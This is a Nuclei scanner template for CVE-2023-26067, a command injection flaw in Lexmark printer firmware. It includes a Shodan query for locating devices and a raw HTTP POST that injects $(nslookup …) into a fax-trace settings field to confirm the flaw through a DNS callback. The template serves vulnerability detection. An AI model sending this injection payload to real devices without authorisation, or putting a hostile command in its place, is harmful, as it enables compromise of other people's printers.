id: CVE-2023-26067 info: name: Lexmark Printers - Command Injection author: DhiyaneshDK severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). impact: | Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/ - https://github.com/horizon3ai/CVE-2023-26067 - https://nvd.nist.gov/vuln/detail/CVE-2023-26067 - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf - https://support.lexmark.com/alerts/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.04701 epss-percentile: 0.9181 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lexmark product: cxtpc_firmware shodan-query: "Server: Lexmark_Web_Server" tags: cve2023,cve,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' http: - raw: - | POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 49 FT_Custom_lbtrace=$({{cmd}}) matchers: - type: dsl dsl: - contains(interactsh_protocol, 'dns') - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and # digest: 4a0a0047304502206881d5b1e598317af061b60f821e466075795a37a0f93409baa5f5821e33b5760221008f73ce734a8f7c3778457fe33ba32f1554ed022f7f2bacb04bc6ff281be1cf00:922c64590222798bb761d5b6d8e72950